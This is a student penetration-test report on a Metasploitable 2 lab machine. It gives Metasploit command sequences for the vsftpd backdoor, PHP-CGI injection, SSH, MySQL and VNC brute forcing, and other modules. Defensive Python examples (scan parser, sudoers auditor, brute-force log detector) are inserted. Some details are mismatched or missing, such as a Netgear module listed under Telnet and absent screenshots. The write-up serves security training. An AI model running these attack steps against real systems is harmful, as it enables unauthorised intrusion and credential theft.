
ASSIGNMENT-3

EXPLOITING THE METASPLOITABLE MACHINE


ASSESSMENT REPORT

BY: - S VENKATESH REDDY

TARGET: - 10.0.3.6

Exploitation is probably one of the most glamorous parts of a penetration test, yet it is often done with brute force rather than with precision. An exploit should be run only when you know almost beyond a shadow of a doubt that it will succeed. This report uses a Kali Linux machine to exploit a Metasploitable 2 Linux target with various Metasploit exploits and auxiliary modules, from a pentester's perspective.

This assignment is most helpful for a beginner pentester, and useful for red teams who find bugs in a machine and exploit loopholes in a server or IoT devices.

BRIEF CONTENTS

1. Introduction

2. NMAP Scan for Open ports

3. Vsftpd exploit on FTP port

4. OpenSSH exploit

5. Linux Telnetd exploit

6. Postfix SMTP (Zimbra) Exploit

7. ISC BIND (DNS) EXPLOIT

8. Web Server Exploit (Port 80)

9. Apache Tomcat Exploit

10. MySQL Exploit

11. VNC Exploit

12. Unreal IRCD exploit

Conclusion

1. INTRODUCTION
Metasploit Pro is an exploitation and vulnerability validation tool that helps you divide the penetration testing workflow into manageable sections. While you can set up your own workflow, listed below is a typical workflow to help you get started.
Firstly, to perform the attack on Metasploitable, we need to carry out the enumeration process from the attacking machine. For this purpose a number of tools are available in Kali Linux; Nmap and Nikto are the most commonly used. We use Nmap in our case.

1. Identify the target: Select the target system or network you want to test.
2. Gather information: Conduct reconnaissance on the target to gather as
much information as possible, including network topology, operating
system, applications running on the system, and open ports.
3. Identify vulnerabilities: Use tools such as Nmap or Nessus to identify
vulnerabilities in the target system.
4. Exploit vulnerabilities: Once vulnerabilities are identified, use Metasploit to
exploit them. Metasploit provides a range of exploits and payloads that can
be used to gain access to the target system.
5. Gain access and escalate privileges: Once access is gained, escalate
privileges to gain greater control over the system.
6. Maintain access: Use backdoors and other techniques to maintain access to
the system for future use.

2. NMAP Scan for Open ports
• Nmap acts as the first phase of the attack, in which information about the target machine or server is gathered.
• The discovery scan includes a UDP scan, which sends UDP probes to the most commonly known UDP ports, such as NetBIOS, DHCP, DNS, and SNMP. The scan tests approximately 250 ports that are typically exposed for external services and are more commonly tested during a penetration test.
• Below is the screenshot attached for the Nmap scan done on the target.

Exploitation will be performed for the open ports listed below, using the msfconsole -q command on Kali Linux.
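As an added example, not part of the original report, the following Python parses the XML that Nmap writes with -oX and keeps only the ports reported as definitely open, which is the list the following sections work through. The XML is a constructed excerpt; only the target address and the vsftpd and Apache versions come from the report.

```python
import xml.etree.ElementTree as ET

# Constructed excerpt in the format of `nmap -sV -oX`; not the report's real scan output.
# Products and versions named in the report (vsftpd 2.3.4, Apache 2.2.8) are reused,
# everything else is a placeholder.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -sU -oX scan.xml 10.0.3.6">
<host><address addr="10.0.3.6" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="2.3.4"/></port>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
<port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd" version="2.2.8"/></port>
<port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/></port>
<port protocol="tcp" portid="5900"><state state="open"/><service name="vnc"/></port>
<port protocol="tcp" portid="139"><state state="closed"/><service name="netbios-ssn"/></port>
<port protocol="udp" portid="53"><state state="open"/><service name="domain" product="ISC BIND"/></port>
<port protocol="udp" portid="161"><state state="open|filtered"/><service name="snmp"/></port>
</ports></host></nmaprun>"""

def open_ports(xml_text):
    """Return a list of dicts for every port Nmap reported as definitely open."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue  # skip closed, filtered and the UDP "open|filtered" guess
            svc = port.find("service")
            found.append({"host": addr, "proto": port.get("protocol"), "port": int(port.get("portid")),
                          "service": svc.get("name", "") if svc is not None else "",
                          "product": svc.get("product", "") if svc is not None else "",
                          "version": svc.get("version", "") if svc is not None else ""})
    return found

def service_summary(xml_text):
    """Map 'proto/port' -> 'product version' (or the bare service name) for the port table."""
    summary = {}
    for p in open_ports(xml_text):
        label = " ".join(x for x in (p["product"], p["version"]) if x) or p["service"]
        summary[f"{p['proto']}/{p['port']}"] = label
    return summary
```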
3. Vsftpd exploit on FTP port
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This
backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011
according to the most recent information available.

Step 1: Start the Metasploit Console

1.1 msfconsole

1.2 Use the VSFTPD v2.3.4 Backdoor Command Execution exploit

• search vsftpd
• use exploit/unix/ftp/vsftpd_234_backdoor

1.3 Set RHOST (victim IP address)

1. show options
2. set RHOST 10.0.3.6

1.4 Exploit

• Now you should see a command shell session opened between the attacking machine and Metasploitable.

From the above we can see that port 21 (FTP) is open on the target machine and can be exploited.

4 OpenSSH exploit
The Secure Shell Protocol (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network. Here we brute force SSH over port 22, gain access with a valid username and password, and maintain access by changing the configuration in /etc/ssh/sshd_config.

• Select the SSH auxiliary module by giving the following command

Set the options as needed:

• set RHOSTS 10.0.3.6 (vulnerable machine address)
• set PASS_FILE /home/kali/Desktop/passwords.txt (path of the passwords text file)
• set USER_FILE /root/Desktop/usernames.txt (path of the usernames text file)
• set VERBOSE true (shows the exact username and password combination that matched)

Start the brute force with the exploit command in msfconsole.

5 Linux Telnetd
• Exploring for vulnerabilities on Linux Telnet over port 23.

The linux/telnet/netgear_telnetenable module, which has an excellent rank, is used to attempt to enable Telnet.

6 Postfix SMTP (Zimbra) Exploit
This module exploits a vulnerable sudo configuration that permits the zimbra user to execute postfix as root. In turn, postfix can execute arbitrary shell scripts, which means it can execute a root shell.

Here is how the linux/local/zimbra_postfix_priv_esc exploit module looks in the msfconsole

This is a complete list of options available in the linux/local/zimbra_postfix_priv_esc exploit

Here is a complete list of advanced options supported by the linux/local/zimbra_postfix_priv_esc exploit

This is a list of possible payloads which can be delivered and executed on the target system using the
linux/local/zimbra_postfix_priv_esc exploit

Here is the full list of possible evasion options supported by the linux/local/zimbra_postfix_priv_esc exploit, intended to evade defenses (e.g. antivirus, EDR, firewall, NIDS, etc.)
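An added example, not part of the report or of the Metasploit module, of the check a defender would run for the misconfiguration this section describes: a small auditor for sudoers rules that let a non-root account run shell-capable commands as root. The sudoers excerpt and the postfix binary path in it are constructed.

```python
import re

# Constructed sudoers excerpt for illustration; the postfix path is hypothetical.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults    env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
zimbra  ALL=(root) NOPASSWD: /opt/zimbra/postfix/sbin/postfix
zimbra  ALL=(root) NOPASSWD: /opt/zimbra/libexec/zmstat-fd
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
"""

# postfix is flagged because, as the section notes, it can run arbitrary scripts as root;
# the others are shells and editors that can spawn one. Extend with your own findings.
SHELL_CAPABLE = {"postfix", "sh", "bash", "vi", "vim", "less"}

# user host=(runas) [TAG:]... commands
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)

def audit_sudoers(text):
    """Return [(user, command, reason)] for rules granting root to non-root accounts."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m or m.group("user") == "root":
            continue
        runas_user = (m.group("runas") or "root").split(":")[0]  # default runas is root
        if runas_user not in ("root", "ALL"):
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append((m.group("user"), cmd, "unrestricted root"))
            elif binary in SHELL_CAPABLE:
                reason = "can spawn root shell" + (" without password" if nopasswd else "")
                findings.append((m.group("user"), cmd, reason))
    return findings
```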

7 ISC BIND (DNS) EXPLOIT

This exploit targets a fairly ubiquitous flaw in DNS implementations which allows the insertion of malicious DNS records into the cache of the target nameserver. It caches a single malicious nameserver entry in the target nameserver which replaces the legitimate nameservers for the target domain. By causing the target nameserver to query for random hostnames at the target domain, the attacker can spoof a response to the target server including an answer for the query, an authority server record, and an additional record for that server, causing the target nameserver to insert the additional record into the cache. This insertion completely replaces the original nameserver records for the target domain.

• Module options for performing remote code execution.

• Further details on exploitation using the advanced options on port 53.

• Payload advanced options

• DNS exploitation was carried out, but due to a good firewall configuration the remote host may not have been accepting the request, so no session was created.

8 Web Server Exploit (Port 80)
Port 80 is the default port for HTTP services (web pages). In a previous scan we determined that port 80 is open. It's now time to determine what is running behind that port.

It's Apache running on Ubuntu. Let's try to gather some more info with an auxiliary scanner:

• use auxiliary/scanner/http/http_version
• set rhosts 10.0.3.6
• show options
• run

It's Apache 2.2.8 with PHP 5.2.4. We can navigate to 'http://10.0.3.6/phpinfo.php' and confirm the information already gathered:

Let's try other HTTP modules to obtain more information about our server. 'dir_scanner' will determine if directory listing is enabled:

• use auxiliary/scanner/http/dir_scanner
• set rhosts 10.0.3.6
• run

We got 6 directories. Going through their content might give us an edge to hack our target. Let's try another module, 'files_dir':

• use auxiliary/scanner/http/files_dir
• show options
• run

Once again, these results might make a difference and we should take a look at them. Other modules of interest are 'options', 'robots_txt' and 'verb_auth_bypass':

• use auxiliary/scanner/http/verb_auth_bypass
• show options
• run

CGI remote code execution found. Let's exploit it:

• use exploit/multi/http/php_cgi_arg_injection
• show options
• run

We got a Meterpreter shell!

Port 80 is as good a source of information and exploits as any other port. We'll come back to this port for the web apps installed. In this section we got information about the services running and found an exploit that gave us a shell.

10 MySQL Exploit

This is a MySQL post-exploitation tool used after you discover the database password using a tool like Metasploit's MySQL Login Utility.

10.1 Getting access to the MySQL DB: a password.txt file needs to be created for gaining access. Search for the Metasploit module

• search mysql
• Highlight and right click on auxiliary/scanner/mysql/mysql_login
• Select Copy

10.2 Set the Metasploit module

• use auxiliary/scanner/mysql/mysql_login
• show options
• In the following steps we will set PASS_FILE and RHOSTS

10.3 Set the PASS_FILE and RHOSTS

• set PASS_FILE /root/Desktop/password.txt
• set RHOSTS 10.0.3.6
• set USER_FILE /root/Desktop/username.txt
• show options

10.4 Brute force the MySQL password

• Run exploit
• Notice that the root password (root) was successfully guessed.
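Both this section and the OpenSSH section rely on password guessing, so here, as an added example that is not part of the report, is the detection side: a detector for failed-login bursts and guess-then-success patterns, run over constructed auth.log and MySQL error-log lines.

```python
import re
from collections import defaultdict

# Constructed sample lines in the formats written by OpenSSH to auth.log and by the
# MySQL server error log; hosts, users, IPs and timestamps are made up.
SAMPLE_LOG = """\
Jul  1 10:00:01 target sshd[2201]: Failed password for root from 10.0.3.5 port 51234 ssh2
Jul  1 10:00:02 target sshd[2203]: Failed password for invalid user admin from 10.0.3.5 port 51236 ssh2
Jul  1 10:00:02 target sshd[2205]: Failed password for root from 10.0.3.5 port 51238 ssh2
Jul  1 10:00:03 target sshd[2207]: Failed password for invalid user test from 10.0.3.5 port 51240 ssh2
Jul  1 10:00:03 target sshd[2209]: Failed password for root from 10.0.3.5 port 51242 ssh2
Jul  1 10:00:04 target sshd[2211]: Accepted password for bob from 10.0.3.5 port 51244 ssh2
Jul  1 10:05:00 target sshd[2301]: Failed password for alice from 10.0.3.9 port 40001 ssh2
2023-07-01T10:01:00.000000Z 15 [Note] Access denied for user 'root'@'10.0.3.5' (using password: YES)
2023-07-01T10:01:01.000000Z 16 [Note] Access denied for user 'root'@'10.0.3.5' (using password: YES)
2023-07-01T10:01:01.000000Z 17 [Note] Access denied for user 'root'@'10.0.3.5' (using password: NO)
"""

SSH_FAIL = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
SSH_OK = re.compile(r"sshd\[\d+\]: Accepted \w+ for (\S+) from (\S+) port")
MYSQL_FAIL = re.compile(r"Access denied for user '([^']*)'@'([^']*)'")

def detect_bruteforce(log_text, threshold=5):
    """Return {(service, src_ip): info} for sources with >= threshold failed logins,
    or any source that logged in successfully after failing (a guessed password)."""
    stats = defaultdict(lambda: {"failures": 0, "users": set(), "success_as": None})
    for line in log_text.splitlines():
        if m := SSH_FAIL.search(line):
            service, user, ip = "ssh", m.group(1), m.group(2)
        elif m := MYSQL_FAIL.search(line):
            service, user, ip = "mysql", m.group(1), m.group(2)
        elif m := SSH_OK.search(line):
            key = ("ssh", m.group(2))
            if key in stats:  # a success only matters after earlier failures from that source
                stats[key]["success_as"] = m.group(1)
            continue
        else:
            continue
        stats[(service, ip)]["failures"] += 1
        stats[(service, ip)]["users"].add(user)
    return {key: info for key, info in stats.items()
            if info["failures"] >= threshold or info["success_as"]}
```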

11 VNC Exploit
The vnc_login auxiliary module will scan an IP address or range of addresses and attempt to login via
VNC with either a provided password or a wordlist. VNC (Virtual Network Computing) is a graphical
desktop sharing system that allows you to remotely control a computer over a network connection.

• Trying to exploit the remote computer using the capture technique and exploiting with different options.

We set our target range, threads, and perhaps most importantly, the BRUTEFORCE_SPEED value. Many
newer VNC servers will automatically ban further login attempts if too many failed ones are made
consecutively.

With our module configuration set, we run the module. Notice in the output below that Metasploit automatically adjusts the retry interval after being notified of too many failed login attempts.

Use the vncviewer command with the target IP address to get access.

Below is the target desktop, connected after the exploit.

Exploiting vnc_none_auth
The vnc_none_auth scanner, as its name implies, scans a range of hosts for VNC servers
that do not have any authentication set on them.

To run our scan, we simply set the RHOSTS and THREADS values and let it run.

In our scan results, we see that one of our targets has wide open GUI access.
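As an added example, not part of the report or of the vnc_none_auth module, this parses the two RFB handshake messages that decide whether a VNC server allows unauthenticated access, using constructed server messages rather than live traffic; it is the check to run against your own hosts.

```python
import struct

# Security type numbers from the RFB protocol specification.
SECURITY_TYPES = {0: "Invalid", 1: "None", 2: "VNC Authentication", 5: "RA2", 6: "RA2ne",
                  16: "Tight", 18: "TLS", 19: "VeNCrypt"}

def parse_server_version(data):
    """Parse the 12-byte ProtocolVersion message 'RFB xxx.yyy\\n' into (major, minor)."""
    if len(data) < 12 or data[:4] != b"RFB " or data[11:12] != b"\n":
        raise ValueError("not an RFB version banner")
    return int(data[4:7]), int(data[8:11])

def parse_security_types(version, data):
    """Parse the server's security-type message that follows the version exchange.
    RFB 3.3: a single big-endian U32 type chosen by the server.
    RFB 3.7/3.8: U8 count followed by count U8 types (count 0 = failure + reason string)."""
    if version == (3, 3):
        (sec_type,) = struct.unpack(">I", data[:4])
        return [sec_type]
    count = data[0]
    if count == 0:
        (reason_len,) = struct.unpack(">I", data[1:5])
        reason = data[5:5 + reason_len].decode("latin-1", "replace")
        raise ConnectionError(f"server refused connection: {reason}")
    return list(data[1:1 + count])

def audit(version_banner, sec_msg):
    """Return (version string, [security type names], allows_unauthenticated)."""
    version = parse_server_version(version_banner)
    types = parse_security_types(version, sec_msg)
    names = [SECURITY_TYPES.get(t, f"unknown({t})") for t in types]
    return (f"{version[0]}.{version[1]}", names, 1 in types)  # type 1 = "None" auth

# Constructed server messages (what two recv() calls would return), not captured traffic.
OPEN_SERVER_38 = (b"RFB 003.008\n", bytes([2, 1, 2]))      # offers None and VNC Auth
LOCKED_SERVER_38 = (b"RFB 003.008\n", bytes([1, 2]))       # VNC Auth only
OPEN_SERVER_33 = (b"RFB 003.003\n", struct.pack(">I", 1))  # 3.3 server with no auth
```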
